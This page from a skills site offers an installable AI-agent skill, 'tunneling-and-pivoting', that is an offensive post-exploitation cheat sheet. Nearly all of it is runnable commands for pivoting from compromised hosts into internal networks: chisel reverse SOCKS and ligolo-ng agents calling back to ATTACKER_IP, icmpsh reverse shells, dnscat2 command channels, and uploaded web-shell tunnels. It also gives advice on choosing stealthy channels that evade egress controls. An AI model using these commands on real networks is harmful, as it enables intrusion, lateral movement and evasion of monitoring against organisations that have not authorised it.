DiscordSign up
SKILLS.SH

tunneling-and-pivoting

>-

INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill tunneling-and-pivoting
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

$27

Forward a local port to a remote service through the pivot.

# Access INTERNAL_HOST:3306 via localhost:3306

ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N

# Access internal web app

ssh -L 8080:10.10.10.100:80 user@PIVOT -N

# Browse: http://localhost:8080

# Bind to all interfaces (share with teammates)

ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N

Remote Port Forward

Expose a local service to the pivot host's network.

# Make attacker's port 8000 accessible on pivot as pivot:9000

ssh -R 9000:127.0.0.1:8000 user@PIVOT -N

# Expose attacker's listener to internal network

ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N

# Internal hosts connect to PIVOT:4444 → reaches attacker:4444

Dynamic Port Forward (SOCKS Proxy)

# Create SOCKS4/5 proxy on localhost:1080

ssh -D 1080 user@PIVOT -N

# Use with proxychains

echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf

proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24

# Or with browser SOCKS proxy → browse internal web apps

Jump Host (ProxyJump)

# Single jump

ssh -J jumphost user@TARGET

# Multiple jumps

ssh -J jump1,jump2 user@TARGET

# SSH config for persistent jump

# ~/.ssh/config

Host internal-target

    HostName 10.10.10.100

    User admin

    ProxyJump user@jumphost.example.com

2. CHISEL

Reverse SOCKS Proxy (Most Common)

# Attacker: start chisel server

chisel server --reverse --port 8080

# Victim: connect back as client, create reverse SOCKS

chisel client ATTACKER_IP:8080 R:socks

# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080

proxychains nmap -sT -Pn INTERNAL/24

Port Forwarding

# Forward specific port

chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306

# Multiple forwards

chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80

# Reverse port forward (expose attacker service to victim network)

chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444

3. LIGOLO-NG

TUN interface-based pivoting — transparent routing without SOCKS.

# Attacker: start proxy

sudo ip tuntap add user $(whoami) mode tun ligolo

sudo ip link set ligolo up

ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# Agent (victim): connect to proxy

ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert

# In ligolo-proxy console:

>> session                    # select agent session

>> ifconfig                   # view agent's network interfaces

>> start                      # start tunnel

# Add routes on attacker to reach internal networks

sudo ip route add 10.10.10.0/24 dev ligolo

sudo ip route add 172.16.0.0/16 dev ligolo

Listener (Reverse Shell Catcher Through Pivot)

# In ligolo-proxy console:

>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp

# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444

Double Pivot

# Agent 1 on DMZ → tunnel to internal network 1

# Agent 2 on internal network 1 → tunnel to internal network 2

# Add routes for both networks on attacker

sudo ip route add 10.0.0.0/24 dev ligolo    # via agent 1

sudo ip route add 172.16.0.0/24 dev ligolo  # via agent 2

4. SOCAT

# TCP port forward

socat TCP-LISTEN:8080,fork TCP:INTERNAL:80

# UDP relay

socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53

# Encrypted tunnel

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80

# File transfer via socat

# Receiver:

socat TCP-LISTEN:9999,fork file:received_file,create

# Sender:

socat TCP:RECEIVER:9999 file:send_file

5. PROXYCHAINS / PROXIFIER

ProxyChains Configuration

# /etc/proxychains4.conf

strict_chain          # fail if any proxy is down

# dynamic_chain       # skip dead proxies

# random_chain        # randomize proxy order

[ProxyList]

socks5 127.0.0.1 1080        # first hop (SSH dynamic forward)

socks5 127.0.0.1 1081        # second hop (if chaining)
# Usage

proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24

proxychains crackmapexec smb 10.10.10.0/24

proxychains evil-winrm -i 10.10.10.50 -u admin -p pass

6. WINDOWS PIVOTING

Netsh Port Forwarding

:: Forward port (requires admin)

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

:: List forwards

netsh interface portproxy show all

:: Remove

netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0

Plink (PuTTY CLI)

:: Dynamic SOCKS (like ssh -D)

plink.exe -ssh -D 1080 -N user@ATTACKER

:: Remote port forward

plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER

:: Automated (non-interactive, accept host key)

echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER

7. DNS TUNNELING

# iodine — IP-over-DNS

# Server (attacker, with NS record pointing to attacker):

iodined -f -c -P password 10.0.0.1 t1.yourdomain.com

# Client (victim):

iodine -f -P password t1.yourdomain.com

# Creates dns0 interface → route traffic through it

# dnscat2 — command channel over DNS

# Server:

ruby dnscat2.rb yourdomain.com

# Client:

./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET

8. ICMP TUNNELING

# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)

# Attacker:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python3 icmpsh_m.py ATTACKER_IP VICTIM_IP

# Victim (Windows):

icmpsh.exe -t ATTACKER_IP

# ptunnel-ng — TCP-over-ICMP

# Server:

ptunnel-ng -r INTERNAL_HOST -R 22

# Client:

ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22

ssh -p 2222 user@127.0.0.1

9. HTTP TUNNELING

# Neo-reGeorg — SOCKS proxy via web shell

# Generate tunnel web shell:

python3 neoreg.py generate -k PASSWORD

# Upload tunnel.php/aspx/jsp to target web server

# Connect:

python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php

# SOCKS proxy on 127.0.0.1:1080

# Tunna — HTTP tunnel (alternative)

python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP

10. PIVOTING DECISION MATRIX

Egress Allowed

Tool

Notes

TCP outbound (any port)

Chisel, Ligolo-ng, SSH

Fastest setup

TCP 80/443 only

Chisel (HTTP/S), Neo-reGeorg

Blend with web traffic

DNS only (53/udp)

iodine, dnscat2

Slow but stealthy

ICMP only

ptunnel-ng, icmpsh

Very restricted environments

No outbound

Bind shell + port forward in

Needs inbound access to pivot

Web shell only

Neo-reGeorg, Tunna

When only HTTP file upload works

11. DECISION TREE

Compromised host — need to reach internal network

│

├── Can install tools on pivot?

│   ├── YES + outbound TCP allowed?

│   │   ├── Need transparent routing? → Ligolo-ng (§3)

│   │   ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)

│   │   └── SSH available? → SSH dynamic forward (§1)

│   │

│   ├── YES + only HTTP(S) outbound?

│   │   ├── Chisel over HTTPS (§2)

│   │   └── Upload web tunnel → Neo-reGeorg (§9)

│   │

│   ├── YES + only DNS outbound?

│   │   └── iodine or dnscat2 (§7)

│   │

│   └── YES + only ICMP allowed?

│       └── ptunnel-ng or icmpsh (§8)

│

├── Cannot install tools (web shell only)?

│   └── Neo-reGeorg / Tunna via web shell (§9)

│

├── Windows pivot?

│   ├── Admin access? → netsh portproxy (§6)

│   ├── SSH client available? → ssh.exe (Windows 10+) (§1)

│   └── Outbound SSH? → plink (§6)

│

├── Need multi-layer pivot?

│   ├── Ligolo-ng: multiple agents + route stacking (§3)

│   ├── SSH ProxyJump chaining (§1)

│   └── ProxyChains with multiple SOCKS (§5)

│

└── Teammate needs access too?

    ├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)

    └── Share Ligolo-ng routes via common proxy
BrowserAct

Let your agent run on any real-world website

Bypass CAPTCHA & anti-bot for free. Start local, scale to cloud.

Explore BrowserAct Skills →

Related skills

azure-compliance
3/3

Azure compliance scanning, Key Vault expiration auditing, and resource configuration validation. Runs azqr (Azure Quick Review) for comprehensive compliance assessment against best practices across subscriptions and resource groups Monitors Key Vault keys, secrets, and certificates for expiration dates and identifies items without expiration policies Detects orphaned, misconfigured, and non-compliant resources using Resource Graph queries Classifies findings by priority (Critical, High, Medium, Low) with remediation guidance for each issue

Verified authormicrosoft
SKILLS.SH
293K1.1K
2026-05-22
openclaw-secure-linux-cloud
1/3

Use when self-hosting OpenClaw on a cloud server, hardening a remote OpenClaw gateway, choosing between SSH tunneling, Tailscale, or reverse-proxy exposure, or…

xixu-me
SKILLS.SH
150K53
2026-05-22
entra-agent-id
3/3

Provision Microsoft Entra Agent Identity Blueprints, BlueprintPrincipals, and per-instance Agent Identities via Microsoft Graph, and configure OAuth 2.0 token…

Verified authormicrosoft
SKILLS.SH
59.1K1.1K
2026-05-21
firebase-security-rules-auditor
3/3

A skill to evaluate how secure Firestore security rules are. Use this when Firestore security rules are updated to ensure that the generated rules are…

firebase
SKILLS.SH
23.5K292
2026-05-21

Stop writing automation&scrapers

Install the CLI. Run your first Skill in 30 seconds. Scale when you're ready.

Start free
free · no credit card